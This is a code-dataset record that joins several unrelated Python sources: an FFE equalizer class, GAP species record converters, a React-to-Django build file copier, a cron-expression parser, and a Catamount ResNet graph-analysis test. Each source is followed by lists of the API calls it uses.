def __init__(self, config, chan, cursor_pos=2, sampl_rate=1e9, t_max=0, iterations=200000, blind=False):
self.config = config
self.channel = chan
self.qc = Quantizer(width=self.config["parameters"]["input_precision"], signed=True)
self.qw = Quantizer(width=self.config["parameters"]["weight_precision"], signed=True)
self.t_max = t_max
self.sampl_rate = sampl_rate
self.cursor_pos = cursor_pos
self.iterations = iterations
self.blind=blind
self.ideal_codes= self.__random_ideal_codes()
self.channel_output = self.__random_codes()
self.quantized_channel_output = self.qc.quantize_2s_comp(self.channel_output)
self.weights = self.calculate_ffe_coefficients(initial=True)
self.filt = self.generate_ffe(self.weights)
def __random_ideal_codes(self):
return np.random.randint(2, size=self.iterations)*2 - 1
def __random_codes(self):
t_delay = -self.t_max + self.cursor_pos/self.sampl_rate
return self.channel.compute_output(self.ideal_codes, f_sig=16e9, t_delay=t_delay)
def randomize_codes(self):
self.ideal_codes = __random_codes();
self.channel_output = self.channel(self.ideal_codes)
def calculate_ffe_coefficients(self, mu=0.1, initial=False,blind=None):
if blind == None:
blind = self.blind
ffe_length = self.config['parameters']['length']
ffe_adapt_mu = 0.1
if initial:
adapt = Wiener(step_size = ffe_adapt_mu, num_taps = ffe_length, cursor_pos=int(ffe_length/2))
else:
adapt = Wiener(step_size = ffe_adapt_mu, num_taps = ffe_length, cursor_pos=int(ffe_length/2), weights=self.weights)
st_idx = self.cursor_pos + int(ffe_length/2)
for i in range(st_idx, self.iterations):
adapt.find_weights_pulse(self.ideal_codes[i-st_idx], self.channel_output[i], blind=blind)
return self.qw.quantize_2s_comp(adapt.weights)
def generate_ffe(self, weights):
return Fir(len(weights), weights, self.config["parameters"]["width"])
def calculate_shift(self):
#The Quantizer can't be used arbitrarily due to its clipping
#Calculate the average maximum value that will occur on the output of the FFE for the given channel
max_val = np.sum(np.abs([round(val/self.qc.lsb) for val in self.filt(self.channel_output)]))/len(self.channel_output)
#Calculate tbe bitwidth (and account for the sign)
val_bitwidth = np.ceil(np.log2(max_val)) + 1 #
out_bitwidth = self.config['parameters']['output_precision']
#Calculate the amount that the FFE output needs to be shifted to avoid overflow
#the +1 is a hedge here
shift = int(val_bitwidth - out_bitwidth) + 1
shift = shift if shift >= 0 else 0
#Calculate the width of the shifter
#the +1 is also a hedge here as well
shift_bitwidth = int(np.ceil(np.log2(shift))) + 1
return shift, shift_bitwidth
#Have to add in support for the quantization
| [
"numpy.log2",
"numpy.random.randint"
] | [((979, 1021), 'numpy.random.randint', 'np.random.randint', (['(2)'], {'size': 'self.iterations'}), '(2, size=self.iterations)\n', (996, 1021), True, 'import numpy as np\n'), ((2660, 2676), 'numpy.log2', 'np.log2', (['max_val'], {}), '(max_val)\n', (2667, 2676), True, 'import numpy as np\n'), ((3101, 3115), 'numpy.log2', 'np.log2', (['shift'], {}), '(shift)\n', (3108, 3115), True, 'import numpy as np\n')] |
def gapToTIR(sbItem):
from datetime import datetime
from bis import bis
_gapTaxonomicGroups = {}
_gapTaxonomicGroups["m"] = "mammals"
_gapTaxonomicGroups["b"] = "birds"
_gapTaxonomicGroups["a"] = "amphibians"
_gapTaxonomicGroups["r"] = "reptiles"
sbItem["source"] = "GAP Species"
sbItem["registrationDate"] = datetime.utcnow().isoformat()
sbItem["followTaxonomy"] = False
sbItem["taxonomicLookupProperty"] = "tsn"
for tag in sbItem["tags"]:
if tag["scheme"] == "https://www.sciencebase.gov/vocab/bis/tir/scientificname":
sbItem["scientificname"] = tag["name"]
elif tag["scheme"] == "https://www.sciencebase.gov/vocab/bis/tir/commonname":
sbItem["commonname"] = bis.stringCleaning(tag["name"])
sbItem.pop("tags")
for identifier in sbItem["identifiers"]:
if identifier["type"] == "GAP_SpeciesCode":
sbItem["taxonomicgroup"] = _gapTaxonomicGroups[identifier["key"][:1]]
elif identifier["type"] == "ITIS_TSN":
sbItem["tsn"] = identifier["key"]
return sbItem
# This function is similar to the first one we created for bundling GAP species information from ScienceBase but it flattens the structure to make things simpler for downstream use.
def gapToTIR_flat(sbItem):
from datetime import datetime
from bis import bis
_gapTaxonomicGroups = {}
_gapTaxonomicGroups["m"] = "mammals"
_gapTaxonomicGroups["b"] = "birds"
_gapTaxonomicGroups["a"] = "amphibians"
_gapTaxonomicGroups["r"] = "reptiles"
newItem = {}
newItem["sbdoc"] = sbItem
newItem["source"] = "GAP Species"
newItem["registrationDate"] = datetime.utcnow().isoformat()
newItem["followTaxonomy"] = False
newItem["taxonomicLookupProperty"] = "tsn"
for tag in sbItem["tags"]:
if tag["scheme"] == "https://www.sciencebase.gov/vocab/bis/tir/scientificname":
newItem["scientificname"] = tag["name"]
elif tag["scheme"] == "https://www.sciencebase.gov/vocab/bis/tir/commonname":
newItem["commonname"] = bis.stringCleaning(tag["name"])
for identifier in sbItem["identifiers"]:
newItem[identifier["type"]] = identifier["key"]
if identifier["type"] == "GAP_SpeciesCode":
newItem["taxonomicgroup"] = _gapTaxonomicGroups[identifier["key"][:1]]
return newItem
| [
"bis.bis.stringCleaning",
"datetime.datetime.utcnow"
] | [((347, 364), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (362, 364), False, 'from datetime import datetime\n'), ((1692, 1709), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (1707, 1709), False, 'from datetime import datetime\n'), ((752, 783), 'bis.bis.stringCleaning', 'bis.stringCleaning', (["tag['name']"], {}), "(tag['name'])\n", (770, 783), False, 'from bis import bis\n'), ((2101, 2132), 'bis.bis.stringCleaning', 'bis.stringCleaning', (["tag['name']"], {}), "(tag['name'])\n", (2119, 2132), False, 'from bis import bis\n')] |
""" Get a react build apps files and move them to django app clearly """
import os, shutil
# configs
STATIC_DIR_PATH = "static"
TEMPLATES_DIR_PATH = "templates"
REACT_APPS_DIR_PATH = "front-end-pages"
TEMPLATE_NAME = "index.html"
STATIC_DIRS = [
'js',
'css',
'media'
]
# end configs
def createBasicDirs():
for dir in STATIC_DIRS:
try:
os.mkdir(os.path.join(STATIC_DIR_PATH, dir))
except FileExistsError:
pass
def copyReactAppsToDjango():
# get apps folder
react_apps = [ path for path in os.listdir(REACT_APPS_DIR_PATH) if os.path.isdir(os.path.join(REACT_APPS_DIR_PATH, path))]
# copy each app to django
for app in react_apps:
build_path = os.path.join(REACT_APPS_DIR_PATH, app, 'build')
if not os.path.exists(build_path):
raise Exception(
"\n Build dir doesn't exists"+
"\n You should run npm run build first !"+
f"\n App name: {app}"+
f"\n Build dir path: {build_path}"
)
build_static_path = os.path.join(build_path, 'static')
# copy files
# template index.html
shutil.copyfile(
os.path.join(build_path, TEMPLATE_NAME),
os.path.join(TEMPLATES_DIR_PATH, f"{app}.html")
)
# static (js, css, media)
for dir in STATIC_DIRS:
dir_path = os.path.join(build_static_path, dir)
django_static_path = os.path.join(STATIC_DIR_PATH, dir)
files = os.listdir(dir_path)
for file in files:
shutil.copyfile(
os.path.join(dir_path, file),
os.path.join(django_static_path, file)
)
def main():
createBasicDirs()
copyReactAppsToDjango()
if __name__ == "__main__":
main()
| [
"os.path.exists",
"os.listdir",
"os.path.join"
] | [((727, 774), 'os.path.join', 'os.path.join', (['REACT_APPS_DIR_PATH', 'app', '"""build"""'], {}), "(REACT_APPS_DIR_PATH, app, 'build')\n", (739, 774), False, 'import os, shutil\n'), ((1086, 1120), 'os.path.join', 'os.path.join', (['build_path', '"""static"""'], {}), "(build_path, 'static')\n", (1098, 1120), False, 'import os, shutil\n'), ((558, 589), 'os.listdir', 'os.listdir', (['REACT_APPS_DIR_PATH'], {}), '(REACT_APPS_DIR_PATH)\n', (568, 589), False, 'import os, shutil\n'), ((790, 816), 'os.path.exists', 'os.path.exists', (['build_path'], {}), '(build_path)\n', (804, 816), False, 'import os, shutil\n'), ((1209, 1248), 'os.path.join', 'os.path.join', (['build_path', 'TEMPLATE_NAME'], {}), '(build_path, TEMPLATE_NAME)\n', (1221, 1248), False, 'import os, shutil\n'), ((1262, 1309), 'os.path.join', 'os.path.join', (['TEMPLATES_DIR_PATH', 'f"""{app}.html"""'], {}), "(TEMPLATES_DIR_PATH, f'{app}.html')\n", (1274, 1309), False, 'import os, shutil\n'), ((1409, 1445), 'os.path.join', 'os.path.join', (['build_static_path', 'dir'], {}), '(build_static_path, dir)\n', (1421, 1445), False, 'import os, shutil\n'), ((1479, 1513), 'os.path.join', 'os.path.join', (['STATIC_DIR_PATH', 'dir'], {}), '(STATIC_DIR_PATH, dir)\n', (1491, 1513), False, 'import os, shutil\n'), ((1534, 1554), 'os.listdir', 'os.listdir', (['dir_path'], {}), '(dir_path)\n', (1544, 1554), False, 'import os, shutil\n'), ((384, 418), 'os.path.join', 'os.path.join', (['STATIC_DIR_PATH', 'dir'], {}), '(STATIC_DIR_PATH, dir)\n', (396, 418), False, 'import os, shutil\n'), ((607, 646), 'os.path.join', 'os.path.join', (['REACT_APPS_DIR_PATH', 'path'], {}), '(REACT_APPS_DIR_PATH, path)\n', (619, 646), False, 'import os, shutil\n'), ((1639, 1667), 'os.path.join', 'os.path.join', (['dir_path', 'file'], {}), '(dir_path, file)\n', (1651, 1667), False, 'import os, shutil\n'), ((1689, 1727), 'os.path.join', 'os.path.join', (['django_static_path', 'file'], {}), '(django_static_path, file)\n', (1701, 1727), False, 'import os, shutil\n')] |
# standard library
import re
from datetime import datetime
from typing import TypeVar
# fakefill plugin
from fakefill.helpers.logging import getLogger
logger = getLogger("cronvert")
Datetime = TypeVar("datetime", bound=datetime)
DAY_NAMES = list(zip(("SUN", "MON", "TUE", "WED", "THU", "FRI", "SAT"), list(range(7))))
MINUTES = (0, 59)
HOURS = (0, 23)
DAYS_OF_MONTH = (1, 31)
MONTHS = (1, 12)
DAYS_OF_WEEK = (0, 6)
L_FIELDS = (DAYS_OF_WEEK, DAYS_OF_MONTH)
FIELD_RANGES = (MINUTES, HOURS, DAYS_OF_MONTH, MONTHS, DAYS_OF_WEEK)
MONTH_NAMES = list(
zip(("JAN", "FEB", "MAR", "APR", "MAY", "JUN", "JUL", "AUG", "SEP", "OCT", "NOV", "DEC"), list(range(1, 13)))
)
DEFAULT_EPOCH = (1970, 1, 1, 0, 0, 0)
SUBSTITUTIONS = {
"@yearly": "0 0 1 1 *",
"@annually": "0 0 1 1 *",
"@monthly": "0 0 1 * *",
"@weekly": "0 0 * * 0",
"@daily": "0 0 * * *",
"@midnight": "0 0 * * *",
"@hourly": "0 * * * *",
}
VALIDATE_POUND = re.compile("^[0-6]#[1-5]")
VALIDATE_L_IN_DOW = re.compile("^[0-6]L$")
VALIDATE_W = re.compile("^[0-3]?[0-9]W$")
def cron_counts(cronexpr: str) -> int:
try:
return __CronToMonthly__(cronexpr)()
except Exception:
logger.warning(f"Cannot parse cron expression: {cronexpr}. Using default value: 30")
return 30
class __CronToMonthly__:
def __init__(self, line: str, epoch=DEFAULT_EPOCH, epoch_utc_offset: int = 0):
"""
Instantiates a CronExpression object with an optionally defined epoch.
If the epoch is defined, the UTC offset can be specified one of two
ways: as the sixth element in 'epoch' or supplied in epoch_utc_offset.
The epoch should be defined down to the minute sorted by
descending significance.
"""
self.compute_epoch(line, epoch=DEFAULT_EPOCH, epoch_utc_offset=0)
def __call__(self) -> int:
""" This method is just to calculate an approximate upper limit.
Crontab like `* 8 1 * Sun` will be round up to "every minute past hour 8 on first day of month"
i.e. Weekday will be dropped if get month day
Range -> 0 <= base_unit <= 1440 per day
"""
minute, hour, day, _, _ = self.numerical_tab
# Get execution times
count_min = len(minute)
count_hour = len(hour)
count_day = len(day)
base_unit = 1
daily_unit = 1
base_unit *= count_min if count_min else base_unit
base_unit *= count_hour if count_hour else base_unit
daily_unit = base_unit
base_unit *= count_day if count_day else base_unit
return base_unit, daily_unit
def __repr__(self):
base = self.__class__.__name__ + "(%s)"
cron_line = self.string_tab + [str(self.comment)]
if not self.comment:
cron_line.pop()
arguments = '"' + " ".join(cron_line) + '"'
if self.epoch != DEFAULT_EPOCH:
return base % (arguments + ", epoch=" + repr(self.epoch))
else:
return base % arguments
def __str__(self):
return repr(self)
def compute_epoch(self, line: str, epoch=DEFAULT_EPOCH, epoch_utc_offset: int = 0):
for key, value in list(SUBSTITUTIONS.items()):
if line.startswith(key):
line = line.replace(key, value)
break
fields = line.split(None, 5)
if len(fields) == 5:
fields.append("")
minutes, hours, dom, months, dow, self.comment = fields
dow = dow.replace("7", "0").replace("?", "*")
dom = dom.replace("?", "*")
for monthstr, monthnum in MONTH_NAMES:
months = months.upper().replace(monthstr, str(monthnum))
for dowstr, downum in DAY_NAMES:
dow = dow.upper().replace(dowstr, str(downum))
self.string_tab = [minutes, hours, dom, months, dow]
self.compute_numtab()
if len(epoch) == 5:
y, mo, d, h, m = epoch
self.epoch = (y, mo, d, h, m, epoch_utc_offset)
else:
self.epoch = epoch
def compute_numtab(self):
"""
Recomputes the sets for the static ranges of the trigger time.
This method should only be called by the user if the string_tab
member is modified.
"""
self.numerical_tab = []
for field_str, span in zip(self.string_tab, FIELD_RANGES):
split_field_str = field_str.split(",")
if len(split_field_str) > 1 and "*" in split_field_str:
raise ValueError('"*" must be alone in a field.')
unified = set()
for cron_atom in split_field_str:
# parse_atom only handles static cases
if not (is_special_atom(cron_atom, span)):
unified.update(parse_atom(cron_atom, span))
self.numerical_tab.append(unified)
if self.string_tab[2] == "*" and self.string_tab[4] != "*":
self.numerical_tab[2] = set()
elif self.string_tab[4] == "*" and self.string_tab[2] != "*":
self.numerical_tab[4] = set()
def is_special_atom(cron_atom, span):
"""
Returns a boolean indicating whether or not the string can be parsed by
parse_atom to produce a static set. In the process of examining the
string, the syntax of any special character uses is also checked.
"""
for special_char in ("%", "#", "L", "W"):
if special_char not in cron_atom:
continue
if special_char == "#":
if span != DAYS_OF_WEEK:
raise ValueError('"#" invalid where used.')
elif not VALIDATE_POUND.match(cron_atom):
raise ValueError('"#" syntax incorrect.')
elif special_char == "W":
if span != DAYS_OF_MONTH:
raise ValueError('"W" syntax incorrect.')
elif not (VALIDATE_W.match(cron_atom) and int(cron_atom[:-1]) > 0):
raise ValueError('Invalid use of "W".')
elif special_char == "L":
if span not in L_FIELDS:
raise ValueError('"L" invalid where used.')
elif span == DAYS_OF_MONTH:
if cron_atom != "L":
raise ValueError('"L" must be alone in days of month.')
elif span == DAYS_OF_WEEK:
if not VALIDATE_L_IN_DOW.match(cron_atom):
raise ValueError('"L" syntax incorrect.')
elif special_char == "%":
if not (cron_atom[1:].isdigit() and int(cron_atom[1:]) > 1):
raise ValueError('"%" syntax incorrect.')
return True
else:
return False
def parse_atom(parse, minmax):
"""
Returns a set containing valid values for a given cron-style range of
numbers. The 'minmax' arguments is a two element iterable containing the
inclusive upper and lower limits of the expression.
Examples:
>>> parse_atom("1-5",(0,6))
set([1, 2, 3, 4, 5])
>>> parse_atom("*/6",(0,23))
set([0, 6, 12, 18])
>>> parse_atom("18-6/4",(0,23))
set([18, 22, 0, 4])
>>> parse_atom("*/9",(0,23))
set([0, 9, 18])
"""
parse = parse.strip()
increment = 1
if parse == "*":
return set(range(minmax[0], minmax[1] + 1))
elif parse.isdigit():
# A single number still needs to be returned as a set
value = int(parse)
if value >= minmax[0] and value <= minmax[1]:
return set((value,))
else:
raise ValueError('"%s" is not within valid range.' % parse)
elif "-" in parse or "/" in parse:
divide = parse.split("/")
subrange = divide[0]
if len(divide) == 2:
# Example: 1-3/5 or */7 increment should be 5 and 7 respectively
increment = int(divide[1])
if "-" in subrange:
# Example: a-b
prefix, suffix = [int(n) for n in subrange.split("-")]
if prefix < minmax[0] or suffix > minmax[1]:
raise ValueError('"%s" is not within valid range.' % parse)
elif subrange.isdigit():
# Handle offset increments e.g. 5/15 to run at :05, :20, :35, and :50
return set(range(int(subrange), minmax[1] + 1, increment))
elif subrange == "*":
# Include all values with the given range
prefix, suffix = minmax
else:
raise ValueError('Unrecognized symbol "%s"' % subrange)
if prefix < suffix:
# Example: 7-10
return set(range(prefix, suffix + 1, increment))
else:
# Example: 12-4/2; (12, 12 + n, ..., 12 + m*n) U (n_0, ..., 4)
noskips = list(range(prefix, minmax[1] + 1))
noskips += list(range(minmax[0], suffix + 1))
return set(noskips[::increment])
else:
raise ValueError('Atom "%s" not in a recognized format.' % parse)
| [
"re.compile",
"fakefill.helpers.logging.getLogger",
"typing.TypeVar"
] | [((162, 183), 'fakefill.helpers.logging.getLogger', 'getLogger', (['"""cronvert"""'], {}), "('cronvert')\n", (171, 183), False, 'from fakefill.helpers.logging import getLogger\n'), ((196, 231), 'typing.TypeVar', 'TypeVar', (['"""datetime"""'], {'bound': 'datetime'}), "('datetime', bound=datetime)\n", (203, 231), False, 'from typing import TypeVar\n'), ((940, 966), 're.compile', 're.compile', (['"""^[0-6]#[1-5]"""'], {}), "('^[0-6]#[1-5]')\n", (950, 966), False, 'import re\n'), ((987, 1009), 're.compile', 're.compile', (['"""^[0-6]L$"""'], {}), "('^[0-6]L$')\n", (997, 1009), False, 'import re\n'), ((1023, 1051), 're.compile', 're.compile', (['"""^[0-3]?[0-9]W$"""'], {}), "('^[0-3]?[0-9]W$')\n", (1033, 1051), False, 'import re\n')] |
import argparse
import numpy as np
import os
import pickle
import sympy
import sys
sys.setrecursionlimit(50000)
from catamount.api import utils
import catamount.frameworks.tensorflow
from catamount.ops.constant import *
from catamount.ops.variable import *
from catamount.ops.math_ops import MaximumOp
is_pytest_run = False
def test_tf_image_resnet_18():
global is_pytest_run
is_pytest_run = True
run_tf_image_resnet(depth=18, filter_scale=1.0)
def test_tf_image_resnet_34():
global is_pytest_run
is_pytest_run = True
run_tf_image_resnet(depth=34, filter_scale=1.0)
def test_tf_image_resnet_50():
global is_pytest_run
is_pytest_run = True
run_tf_image_resnet(depth=50, filter_scale=1.0)
def test_tf_image_resnet_101():
global is_pytest_run
is_pytest_run = True
run_tf_image_resnet(depth=101, filter_scale=1.0)
def test_tf_image_resnet_152():
global is_pytest_run
is_pytest_run = True
run_tf_image_resnet(depth=152, filter_scale=1.0)
def run_tf_image_resnet(depth, filter_scale=1.0):
global is_pytest_run
model_string = '_d{}_fs{}_'.format(depth, filter_scale)
test_outputs_dir = 'catamount/frameworks/example_graphs/tensorflow/full_models/image_classification'
graph_meta = None
for root, dirs, files in os.walk(test_outputs_dir):
for filename in files:
if 'graph{}'.format(model_string) in filename and '.meta' in filename:
# Take the first graph that we find in the directory
graph_meta = os.path.join(root, filename)
break
if graph_meta is not None:
break
if graph_meta is None:
raise FileNotFoundError('Unable to find model string {} in directory {}'
.format(model_string, test_outputs_dir))
graph = catamount.frameworks.tensorflow.import_graph(graph_meta)
assert graph.isValid()
# Manually remove the inference parts of graph
graph_ops = list(graph._ops_by_name.values())
for op in graph_ops:
# Certain ops are only used for inference
if 'InferenceTower/' in op.name or \
'InferenceRunner/' in op.name or \
op.name == 'MergeAllSummariesRunWithOp/Merge/MergeSummary':
graph.removeOp(op)
assert graph.isValid()
print('Initial graph:\n{}\n'.format(graph))
init_params = graph.calcModelParameters()
print('Initial parameters: {}'.format(init_params))
print('Initial Flops: {}\n'.format(graph.calcAlgFlops()))
print('Placeholders:')
for op in graph.getPlaceholders():
print(op.debugString())
print('')
# Set up symbols to name dimensions
output_classes_symbol = utils.getPositiveIntSymbolFromString('out_classes')
subbatch_size_symbol = utils.getPositiveIntSymbolFromString('subbatch_size')
image_height_symbol = utils.getPositiveIntSymbolFromString('image_height')
image_width_symbol = utils.getPositiveIntSymbolFromString('image_width')
num_in_channels_symbol = utils.getPositiveIntSymbolFromString('num_in_channels')
graph_iters_symbol = utils.getIntSymbolFromString('graph::iters')
feature_channels_symbol = utils.getPositiveIntSymbolFromString('feature_channels')
# Find and replace convolution/pooling dimensions also:
# Dimension(64 * 2^k): conv/pool feature channels
base_output_classes = 1000
base_num_in_channels = 3
base_feature_channels = 64
base_image_height = 224
base_image_width = 224
base_half_im_height = 112
half_im_height_symbol = image_height_symbol // 2
base_half_im_width = 112
half_im_width_symbol = image_width_symbol // 2
base_quart_im_height = 56
quart_im_height_symbol = (image_height_symbol // 2) // 2
base_quart_im_width = 56
quart_im_width_symbol = (image_width_symbol // 2) // 2
base_eighth_im_height = 28
eighth_im_height_symbol = ((image_height_symbol // 2) // 2) // 2
base_eighth_im_width = 28
eighth_im_width_symbol = ((image_width_symbol // 2) // 2) // 2
base_sixtnth_im_height = 14
sixtnth_im_height_symbol = (((image_height_symbol // 2) // 2) // 2) // 2
base_sixtnth_im_width = 14
sixtnth_im_width_symbol = (((image_width_symbol // 2) // 2) // 2) // 2
base_small_im_height = 7
small_im_height_symbol = ((((image_height_symbol // 2) // 2) // 2) // 2) // 2
base_small_im_width = 7
small_im_width_symbol = ((((image_width_symbol // 2) // 2) // 2) // 2) // 2
# TODO (Joel): Add InputQueue ops to avoid manually setting dimensions
in_deque_op = graph.opsByName['QueueInput/input_deque']
# print(in_deque_op.debugString())
out_tensor = in_deque_op._outputs[0]
for idx, sym in enumerate([subbatch_size_symbol, image_height_symbol, image_width_symbol, num_in_channels_symbol]):
out_tensor.shape.setDimension(idx, sym)
out_tensor.shape.dims[idx]._value = None
out_tensor = in_deque_op._outputs[1]
out_tensor.shape.setDimension(0, subbatch_size_symbol)
# Set up a dictionary of placeholders and variables for which we want
# to make dimensions symbolic. Sift out their dimensions
bind_dict = { # Placeholders
'label': [subbatch_size_symbol],
'input': [subbatch_size_symbol, image_height_symbol, image_width_symbol, num_in_channels_symbol],
}
# Parameterize all variable tensor dimensions
for op in graph._ops_by_name.values():
if isinstance(op, VariableOp):
op_name_suffix = op.name.split('/')[-1]
if op_name_suffix == 'W':
if op._outputs[0].shape.rank == 4:
assert 'conv' in op.name
new_shape = []
for i in range(op._outputs[0].shape.rank):
new_shape.append(op._outputs[0].shape.getDimension(i).value)
if new_shape[2] % base_feature_channels == 0:
in_filters = (new_shape[2] // \
base_feature_channels) * \
feature_channels_symbol
elif new_shape[2] == 3:
# This is the first convolution on image channels (3)
assert op.name == 'conv0/W'
in_filters = num_in_channels_symbol
else:
print('FIX ME: base in filters {}'.format(new_shape[2]))
assert 0
if new_shape[3] % base_feature_channels == 0:
out_filters = (new_shape[3] // \
base_feature_channels) * \
feature_channels_symbol
else:
print('FIX ME: base out filters {}'.format(new_shape[3]))
assert 0
new_shape[2] = in_filters
new_shape[3] = out_filters
else:
# This is the output layer with output_classes dimension
assert op.name == 'linear/W'
assert op._outputs[0].shape.rank == 2
in_dim = op._outputs[0].shape.getDimension(0).value
assert in_dim % base_feature_channels == 0
in_dim = (in_dim // base_feature_channels) * \
feature_channels_symbol
new_shape = [in_dim, output_classes_symbol]
bind_dict[op.name] = new_shape
momentum_op_name = '{}/Momentum'.format(op.name)
momentum_op = graph._ops_by_name[momentum_op_name]
bind_dict[momentum_op.name] = new_shape
elif op_name_suffix == 'b':
# This is the output layer with output_classes dimension
assert op.name == 'linear/b'
assert op._outputs[0].shape.rank == 1
assert op._outputs[0].shape.getDimension(0).value == \
base_output_classes
new_shape = [output_classes_symbol]
bind_dict[op.name] = new_shape
momentum_op_name = '{}/Momentum'.format(op.name)
momentum_op = graph._ops_by_name[momentum_op_name]
bind_dict[momentum_op.name] = new_shape
elif op_name_suffix == 'beta' or op_name_suffix == 'gamma' or \
op_name_suffix == 'EMA':
assert op._outputs[0].shape.rank == 1
in_dim = op._outputs[0].shape.getDimension(0).value
assert in_dim % base_feature_channels == 0
in_dim = (in_dim // base_feature_channels) * \
feature_channels_symbol
new_shape = [in_dim]
bind_dict[op.name] = new_shape
if op_name_suffix != 'EMA':
momentum_op_name = '{}/Momentum'.format(op.name)
momentum_op = graph._ops_by_name[momentum_op_name]
bind_dict[momentum_op.name] = new_shape
# Now handle constant values in the graph
const_dict = {}
for op in graph._ops_by_name.values():
if isinstance(op, ConstantOp):
if op._outputs[0].value is None:
continue
if op._outputs[0].shape.rank == 0:
print('{}'.format(op.debugString()))
continue
assert op._outputs[0].shape.rank == 1
values = op._outputs[0].value.tolist()
new_values = []
changed = False
for value in values:
if value > 0 and value % base_feature_channels == 0:
value = (value // base_feature_channels) * feature_channels_symbol
changed = True
new_values.append(value)
# HACKY SPECIAL CASE:
if op.name == 'tower0/gradients/tower0/conv0/Conv2D_grad/Const':
assert new_values[2] == base_num_in_channels
new_values[2] = num_in_channels_symbol
if changed:
const_dict[op.name] = new_values
graph.bindConstantValues(const_dict)
graph.bindShapesAndPropagate(bind_dict, warn_if_ill_defined=(not is_pytest_run), make_symbolic=True)
# Nice little hack to actually propagate MaximumOp values to outputs
for op in graph._ops_by_name.values():
if isinstance(op, MaximumOp):
if op._inputs[0].value is not None and \
op._inputs[1].value is not None:
vmax = np.vectorize(lambda x, y: sympy.Max(x, y))
out_val = vmax(op._inputs[0].value, op._inputs[1].value)
op._outputs[0].setValue(out_val)
graph.bindShapesAndPropagate(bind_dict, warn_if_ill_defined=(not is_pytest_run), make_symbolic=True)
print('Bound values')
print(graph)
bind_subs = {
graph_iters_symbol: 1,
output_classes_symbol: base_output_classes,
subbatch_size_symbol: 32,
image_height_symbol: base_image_height,
image_width_symbol: base_image_width,
num_in_channels_symbol: base_num_in_channels,
feature_channels_symbol: base_feature_channels,
}
correct_params = -1
correct_flops = -1
correct_bytes = -1
correct_footprint = -1
if depth == 18:
correct_params = 11689514
correct_flops = 349684163360
correct_bytes = 7186222676
correct_footprint = 2802084304
elif depth == 34:
correct_params = 21797674
correct_flops = 705506994208
correct_bytes = 11162578644
correct_footprint = 4368689744
elif depth == 50:
correct_params = 25557034
correct_flops = 790954958112
correct_bytes = 32896462028
correct_footprint = 12909734408
elif depth == 101:
correct_params = 44549162
correct_flops = 1506507229472
correct_bytes = 50026672916
correct_footprint = 19690293072
elif depth == 152:
correct_params = 60192810
correct_flops = 2222688328992
correct_bytes = 70967716188
correct_footprint = 27971880088
else:
print('WARN: Tests not defined for depth {}'.format(depth))
# Calculate parameters
# NOTE: Need to remove Momentum optimizer parameters and moving average values
momentum_params = 0
parameters = 0
for op_name in sorted(graph.opsByName.keys()):
op = graph.opsByName[op_name]
if isinstance(op, VariableOp):
if "Momentum" in op.name or "EMA" in op.name:
momentum_params += op.calcModelParameters()
else:
parameters += op.calcModelParameters()
all_weights = graph.calcModelParameters()
assert (all_weights - momentum_params - parameters) == 0
# Calculate model parameter count
resolved_params = parameters.subs(bind_subs)
try:
resolved_params = int(resolved_params)
except:
print('ERROR: resolved_params should be int, but is {} = {}'.format(
type(resolved_params), resolved_params))
assert correct_params < 0 or resolved_params == correct_params, \
'Incorrect model params: {}'.format(resolved_params)
print('Parameters: {}\nWith specified dims: {}\n'.format(parameters, resolved_params))
# Calculate algorithmic Flops
alg_flops = graph.calcAlgFlops()
resolved_flops = alg_flops.subs(bind_subs)
try:
resolved_flops = int(resolved_flops)
except:
print('ERROR: resolved_flops should be int, but is {} = {}'.format(
type(resolved_flops), resolved_flops))
assert correct_flops < 0 or resolved_flops == correct_flops, \
'Incorrect algorithmic flops: {}'.format(resolved_flops)
print('Algorithmic Flops: {}\nWith specified dims: {}\n'.format(alg_flops, resolved_flops))
# Calculate algorthmic Bytes accessed
alg_bytes = graph.calcAlgBytes()
resolved_bytes = alg_bytes.subs(bind_subs)
try:
resolved_bytes = int(resolved_bytes)
except:
print('ERROR: resolved_bytes should be int, but is {} = {}'.format(
type(resolved_bytes), resolved_bytes))
assert correct_bytes < 0 or resolved_bytes == correct_bytes, \
'Incorrect algorithmic bytes: {}'.format(resolved_bytes)
print('Alg bytes accessed: {}\nWith specified dims: {}\n'.format(alg_bytes, resolved_bytes))
# Calculate total memory footprint
alg_footprint = graph.calcAlgFootprint()
resolved_footprint = alg_footprint.subs(bind_subs)
try:
resolved_footprint = int(resolved_footprint)
except:
print('ERROR: resolved_footprint should be int, but is {} = {}'.format(
type(resolved_footprint), resolved_footprint))
assert correct_footprint < 0 or resolved_footprint == correct_footprint, \
'Incorrect algorithmic footprint: {}'.format(resolved_footprint)
print('Alg mem footprint: {}\nWith specified dims: {}\n'.format(alg_footprint, resolved_footprint))
# Calculate algorithmic IO per step
total_io_footprint = 0
for op in graph.getPlaceholders():
total_io_footprint += op.calcAlgFootprint()
resolved_io_footprint = total_io_footprint.subs(bind_subs)
print('Alg IO footprint: {}\nWith specified dims: {}\n'.format(total_io_footprint, resolved_io_footprint))
try: # In case the footprint code is not complete
# Calculate minimal memory footprint
print('Alg min mem footprint {}'.format(graph.calcMinFootprint(symbol_subs=bind_subs)))
except:
pass
if not is_pytest_run:
print('VERBOSE ALGORTHMIC FLOPS:')
graph.calcAlgFlops(verbose=True)
print('')
print('VERBOSE ALGORTHMIC BYTES:')
graph.calcAlgBytes(verbose=True)
print('')
print('VERBOSE ALGORTHMIC FOOTPRINT:')
graph.calcAlgFootprint(verbose=True)
print('')
# HACKY WAY TO SAVE MODELS FOR NOW!
pickle.dump(graph, open('catamount/frameworks/example_graphs/tensorflow/full_models/image_classification/graph_image_resnet_d{}_fs{}.p'.format(depth, filter_scale), 'wb'))
if is_pytest_run:
return
print('\n\n======= Algorithmic graph-level analytics: =======')
feature_channel_dims = [32, 48, 64, 96, 128]
bind_subs.pop(feature_channels_symbol)
resolved_params = parameters.subs(bind_subs)
print('Symbol associations: {}\n'.format(bind_subs))
print('Algorithmic Flops by feature channels, params, and per-batch-sample:')
resolved_flops = alg_flops.subs(bind_subs)
for features_dim in feature_channel_dims:
graph_params = resolved_params.subs({feature_channels_symbol: features_dim})
graph_flops = resolved_flops.subs({feature_channels_symbol: features_dim})
graph_flops_per_sample = float(graph_flops) / \
bind_subs[subbatch_size_symbol]
print('{}\t{}\t{}\t{}'.format(features_dim, graph_params, graph_flops,
int(graph_flops_per_sample)))
print('\nAlgorithmic bytes accessed by feature channels, params:')
resolved_bytes = alg_bytes.subs(bind_subs)
for features_dim in feature_channel_dims:
